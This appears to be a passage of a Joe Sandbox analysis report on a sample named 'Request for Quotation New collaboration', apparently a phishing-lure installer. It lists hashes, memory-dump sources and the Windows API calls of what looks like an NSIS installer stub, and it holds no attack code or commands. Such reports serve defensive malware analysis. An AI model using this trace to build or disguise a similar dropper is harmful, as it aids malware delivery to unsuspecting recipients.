                                                                                                                                  • Opcode Fuzzy Hash: 14905b352b3d659bc4d94f3cb94713e7daf993687f376005e2876de419e732c0
                                                                                                                                  • Instruction Fuzzy Hash: ECD06775E042189BDB11AFA4D8902ECB7B0ABAA321F0060A6D55CA7111D7B099958E56
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2837241314.0000000037EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37EE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_37ee0000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 9a413b31ccc75dea58708a80ee643da8ca4b7bdfe70e42d29e89a01cc8e73897
                                                                                                                                  • Instruction ID: f28a6fab78e86c3c92306f2ba6555d5faf5b55b9bdba9b4a7fb9c7e5975ea85e
                                                                                                                                  • Opcode Fuzzy Hash: 9a413b31ccc75dea58708a80ee643da8ca4b7bdfe70e42d29e89a01cc8e73897
                                                                                                                                  • Instruction Fuzzy Hash: AED09E75D4421CDBDB11DFA4D8903ECB3B1FB9A310F1064A5D44CA7111DBB09E958E55
                                                                                                                                  APIs
                                                                                                                                  • GetDlgItem.USER32(?,00000403), ref: 00405332
                                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 00405341
                                                                                                                                  • GetClientRect.USER32(?,?), ref: 0040537E
                                                                                                                                  • GetSystemMetrics.USER32(00000015), ref: 00405386
                                                                                                                                  • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004053A7
                                                                                                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053B8
                                                                                                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053CB
                                                                                                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053D9
                                                                                                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 004053EC
                                                                                                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040540E
                                                                                                                                  • ShowWindow.USER32(?,00000008), ref: 00405422
                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405443
                                                                                                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405453
                                                                                                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040546C
                                                                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405478
                                                                                                                                  • GetDlgItem.USER32(?,000003F8), ref: 00405350
                                                                                                                                    • Part of subcall function 00404164: SendMessageW.USER32(00000028,?,00000001,00403F90), ref: 00404172
                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405495
                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00005267,00000000), ref: 004054A3
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004054AA
                                                                                                                                  • ShowWindow.USER32(00000000), ref: 004054CE
                                                                                                                                  • ShowWindow.USER32(?,00000008), ref: 004054D3
                                                                                                                                  • ShowWindow.USER32(00000008), ref: 0040551D
                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405551
                                                                                                                                  • CreatePopupMenu.USER32 ref: 00405562
                                                                                                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405576
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00405596
                                                                                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055AF
                                                                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 004055E7
                                                                                                                                  • OpenClipboard.USER32(00000000), ref: 004055F7
                                                                                                                                  • EmptyClipboard.USER32 ref: 004055FD
                                                                                                                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405609
                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00405613
                                                                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405627
                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00405647
                                                                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00405652
                                                                                                                                  • CloseClipboard.USER32 ref: 00405658
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2809614839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000005.00000002.2809587637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809635003.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809662370.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                  • String ID: {
                                                                                                                                  • API String ID: 590372296-366298937
                                                                                                                                  • Opcode ID: 40d8ee56fed0ff9bd7faebda229d010c99ca55f69e8b7427a9ca7d215ef8d0f7
                                                                                                                                  • Instruction ID: 9fa9afbe460ba73b362fbd7a7e80f39848d7c2b38d0fa32ac3ffaaa5a75fb061
                                                                                                                                  • Opcode Fuzzy Hash: 40d8ee56fed0ff9bd7faebda229d010c99ca55f69e8b7427a9ca7d215ef8d0f7
                                                                                                                                  • Instruction Fuzzy Hash: 4AB16B70900209BFDF219F60DD89AAE7B79FB04315F50803AFA05BA1A0C7759E52DF69
                                                                                                                                  APIs
                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C93
                                                                                                                                  • ShowWindow.USER32(?), ref: 00403CB0
                                                                                                                                  • DestroyWindow.USER32 ref: 00403CC4
                                                                                                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CE0
                                                                                                                                  • GetDlgItem.USER32(?,?), ref: 00403D01
                                                                                                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D15
                                                                                                                                  • IsWindowEnabled.USER32(00000000), ref: 00403D1C
                                                                                                                                  • GetDlgItem.USER32(?,00000001), ref: 00403DCA
                                                                                                                                  • GetDlgItem.USER32(?,00000002), ref: 00403DD4
                                                                                                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 00403DEE
                                                                                                                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E3F
                                                                                                                                  • GetDlgItem.USER32(?,00000003), ref: 00403EE5
                                                                                                                                  • ShowWindow.USER32(00000000,?), ref: 00403F06
                                                                                                                                  • EnableWindow.USER32(?,?), ref: 00403F18
                                                                                                                                  • EnableWindow.USER32(?,?), ref: 00403F33
                                                                                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F49
                                                                                                                                  • EnableMenuItem.USER32(00000000), ref: 00403F50
                                                                                                                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F68
                                                                                                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F7B
                                                                                                                                  • lstrlenW.KERNEL32(004226D0,?,004226D0,004281E0), ref: 00403FA4
                                                                                                                                  • SetWindowTextW.USER32(?,004226D0), ref: 00403FB8
                                                                                                                                  • ShowWindow.USER32(?,0000000A), ref: 004040EC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2809614839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000005.00000002.2809587637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809635003.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809662370.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 184305955-0
                                                                                                                                  • Opcode ID: bcef63d1befa62095ffb28f8decf7ccef4978ac163dab3c6641283cf9af83911
                                                                                                                                  • Instruction ID: 25e1393ee42f6df426570fd4a537ecf3dcaf9ce603c4882d15cf919a8637c385
                                                                                                                                  • Opcode Fuzzy Hash: bcef63d1befa62095ffb28f8decf7ccef4978ac163dab3c6641283cf9af83911
                                                                                                                                  • Instruction Fuzzy Hash: 2FC1A071A08205BBDB206F61ED49E3B3A68FB89745F40053EF601B15F1CB799852DB2E
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00406254: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406266
                                                                                                                                    • Part of subcall function 00406254: LoadLibraryA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406271
                                                                                                                                    • Part of subcall function 00406254: GetProcAddress.KERNEL32(00000000,?), ref: 00406282
                                                                                                                                  • lstrcatW.KERNEL32(00436000,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,00436800,76F93420,00000000,00434000), ref: 00403935
                                                                                                                                  • lstrlenW.KERNEL32(00427180,?,?,?,00427180,00000000,00434800,00436000,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,00436800), ref: 004039B5
                                                                                                                                  • lstrcmpiW.KERNEL32(00427178,.exe,00427180,?,?,?,00427180,00000000,00434800,00436000,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000), ref: 004039C8
                                                                                                                                  • GetFileAttributesW.KERNEL32(00427180), ref: 004039D3
                                                                                                                                  • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00434800), ref: 00403A1C
                                                                                                                                    • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                                                                                  • RegisterClassW.USER32(00428180), ref: 00403A59
                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A71
                                                                                                                                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AA6
                                                                                                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403ADC
                                                                                                                                  • LoadLibraryW.KERNEL32(RichEd20), ref: 00403AED
                                                                                                                                  • LoadLibraryW.KERNEL32(RichEd32), ref: 00403AF8
                                                                                                                                  • GetClassInfoW.USER32(00000000,RichEdit20W,00428180), ref: 00403B08
                                                                                                                                  • GetClassInfoW.USER32(00000000,RichEdit,00428180), ref: 00403B15
                                                                                                                                  • RegisterClassW.USER32(00428180), ref: 00403B1E
                                                                                                                                  • DialogBoxParamW.USER32(?,00000000,00403C57,00000000), ref: 00403B3D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2809614839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000005.00000002.2809587637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809635003.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809662370.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                  • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                  • API String ID: 914957316-1115850852
                                                                                                                                  • Opcode ID: d0fa4835c9c244ef81a80b769fa25e5675a0a47ce1ec59f3ecf61db25a6a7c64
                                                                                                                                  • Instruction ID: b862c1471ebdc097eb7bd7ac0b5924faedec86185335dcace1f032bfb9465ac2
                                                                                                                                  • Opcode Fuzzy Hash: d0fa4835c9c244ef81a80b769fa25e5675a0a47ce1ec59f3ecf61db25a6a7c64
                                                                                                                                  • Instruction Fuzzy Hash: 5561B670604201BAE720AF669C46E3B3A6CEB45759F40453FF945B62E2CB786D02CA2D
                                                                                                                                  APIs
                                                                                                                                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040436A
                                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 0040437E
                                                                                                                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040439B
                                                                                                                                  • GetSysColor.USER32(?), ref: 004043AC
                                                                                                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043BA
                                                                                                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043C8
                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 004043CD
                                                                                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043DA
                                                                                                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043EF
                                                                                                                                  • GetDlgItem.USER32(?,0000040A), ref: 00404448
                                                                                                                                  • SendMessageW.USER32(00000000), ref: 0040444F
                                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 0040447A
                                                                                                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044BD
                                                                                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 004044CB
                                                                                                                                  • SetCursor.USER32(00000000), ref: 004044CE
                                                                                                                                  • ShellExecuteW.SHELL32(0000070B,open,00427180,00000000,00000000,00000001), ref: 004044E3
                                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004044EF
                                                                                                                                  • SetCursor.USER32(00000000), ref: 004044F2
                                                                                                                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404521
                                                                                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404533
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2809614839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000005.00000002.2809587637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809635003.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809662370.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                                  • String ID: CB@$N$open
                                                                                                                                  • API String ID: 3615053054-4029390422
                                                                                                                                  • Opcode ID: 2203d86e9aedfb02f953f7f44e7e92c7d68489696ba88c708ebc1c14ae09885d
                                                                                                                                  • Instruction ID: ed67d3ceb40554f4a20f9fe4cecdec295417cbe43b6f72f0b7bb3cee00e3d4b7
                                                                                                                                  • Opcode Fuzzy Hash: 2203d86e9aedfb02f953f7f44e7e92c7d68489696ba88c708ebc1c14ae09885d
                                                                                                                                  • Instruction Fuzzy Hash: 037173B1A00209BFDB109F64DD45A6A7B69FB84315F00813AF705BA2D0C778AD51DF99
                                                                                                                                  APIs
                                                                                                                                  • lstrcpyW.KERNEL32(00425D70,NUL,?,00000000,?,?,?,00405DAC,?,?,00000001,00405924,?,00000000,000000F1,?), ref: 00405C18
                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405DAC,?,?,00000001,00405924,?,00000000,000000F1,?), ref: 00405C3C
                                                                                                                                  • GetShortPathNameW.KERNEL32(00000000,00425D70,00000400), ref: 00405C45
                                                                                                                                    • Part of subcall function 00405ABB: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405ACB
                                                                                                                                    • Part of subcall function 00405ABB: lstrlenA.KERNEL32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFD
                                                                                                                                  • GetShortPathNameW.KERNEL32(?,00426570,00000400), ref: 00405C62
                                                                                                                                  • wsprintfA.USER32 ref: 00405C80
                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00426570,C0000000,00000004,00426570,?,?,?,?,?), ref: 00405CBB
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405CCA
                                                                                                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D02
                                                                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425970,00000000,-0000000A,00409544,00000000,[Rename],00000000,00000000,00000000), ref: 00405D58
                                                                                                                                  • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405D6A
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00405D71
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00405D78
                                                                                                                                    • Part of subcall function 00405B56: GetFileAttributesW.KERNEL32(00000003,00402DFF,00437800,80000000,00000003), ref: 00405B5A
                                                                                                                                    • Part of subcall function 00405B56: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2809614839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000005.00000002.2809587637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809635003.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809662370.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                                                                                                  • String ID: %ls=%ls$NUL$[Rename]$p]B$peB
                                                                                                                                  • API String ID: 1265525490-3322868524
                                                                                                                                  • Opcode ID: 3c8f8921d5db17dcea38d37436245cad2ed6acf29c8dc53bbb3a8225ee1bc969
                                                                                                                                  • Instruction ID: dd28b8746f6bac9015e409c36d2f5baf321d2fce784c03eddf9b1c2e257c4ca8
                                                                                                                                  • Opcode Fuzzy Hash: 3c8f8921d5db17dcea38d37436245cad2ed6acf29c8dc53bbb3a8225ee1bc969
                                                                                                                                  • Instruction Fuzzy Hash: 9741E271604B19BBD2216B715C4DF6B3B6CEF41754F14453BBA01B62D2EA3CA8018EBD
                                                                                                                                  APIs
                                                                                                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                  • DrawTextW.USER32(00000000,004281E0,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2809614839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000005.00000002.2809587637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809635003.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809662370.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                  • String ID: F
                                                                                                                                  • API String ID: 941294808-1304234792
                                                                                                                                  • Opcode ID: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                                                                                                                                  • Instruction ID: 126a239e0572de30fb8c34ac70cebce50066b6690b2383a097db7944ba687981
                                                                                                                                  • Opcode Fuzzy Hash: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                                                                                                                                  • Instruction Fuzzy Hash: DA419A71804249AFCB058FA5DD459BFBFB9FF48310F00802AF951AA1A0C738EA51DFA5
                                                                                                                                  APIs
                                                                                                                                  • GetDlgItem.USER32(?,000003FB), ref: 00404619
                                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00404643
                                                                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 004046F4
                                                                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 004046FF
                                                                                                                                  • lstrcmpiW.KERNEL32(00427180,004226D0,00000000,?,?), ref: 00404731
                                                                                                                                  • lstrcatW.KERNEL32(?,00427180), ref: 0040473D
                                                                                                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040474F
                                                                                                                                    • Part of subcall function 004056AA: GetDlgItemTextW.USER32(?,?,00000400,00404786), ref: 004056BD
                                                                                                                                    • Part of subcall function 0040617E: CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403332,00436800,76F93420,00403512), ref: 004061E1
                                                                                                                                    • Part of subcall function 0040617E: CharNextW.USER32(?,?,?,00000000), ref: 004061F0
                                                                                                                                    • Part of subcall function 0040617E: CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403332,00436800,76F93420,00403512), ref: 004061F5
                                                                                                                                    • Part of subcall function 0040617E: CharPrevW.USER32(?,?,00436800,00436800,00000000,00403332,00436800,76F93420,00403512), ref: 00406208
                                                                                                                                  • GetDiskFreeSpaceW.KERNEL32(004206A0,?,?,0000040F,?,004206A0,004206A0,?,00000000,004206A0,?,?,000003FB,?), ref: 00404810
                                                                                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040482B
                                                                                                                                  • SetDlgItemTextW.USER32(00000000,00000400,00420690), ref: 004048B1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2809614839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000005.00000002.2809587637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809635003.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809662370.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                                                                                  • String ID: A
                                                                                                                                  • API String ID: 2246997448-3554254475
                                                                                                                                  • Opcode ID: 7bae5448d950fa7fc9b780a264b0000045a755fe0574635acf906d6e28ab15ff
                                                                                                                                  • Instruction ID: fc6e5784adbf23f3bf0ca4204261aafad130db7b69f5cfc08d06a9dfd3cb4e02
                                                                                                                                  • Opcode Fuzzy Hash: 7bae5448d950fa7fc9b780a264b0000045a755fe0574635acf906d6e28ab15ff
                                                                                                                                  • Instruction Fuzzy Hash: 1B916FB2900209ABDB11AFA1CC85AAF77B8EF85354F10847BF701B72D1D77C99418B69
                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00402DD0
                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 00402DEC
                                                                                                                                    • Part of subcall function 00405B56: GetFileAttributesW.KERNEL32(00000003,00402DFF,00437800,80000000,00000003), ref: 00405B5A
                                                                                                                                    • Part of subcall function 00405B56: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7C
                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,00435800,00435800,00437800,00437800,80000000,00000003), ref: 00402E35
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,00409230), ref: 00402F7C
                                                                                                                                  Strings
                                                                                                                                  • soft, xrefs: 00402EAC
                                                                                                                                  • Inst, xrefs: 00402EA3
                                                                                                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403013
                                                                                                                                  • Error launching installer, xrefs: 00402E0C
                                                                                                                                  • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FC5
                                                                                                                                  • Null, xrefs: 00402EB5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2809614839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000005.00000002.2809587637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809635003.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809662370.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
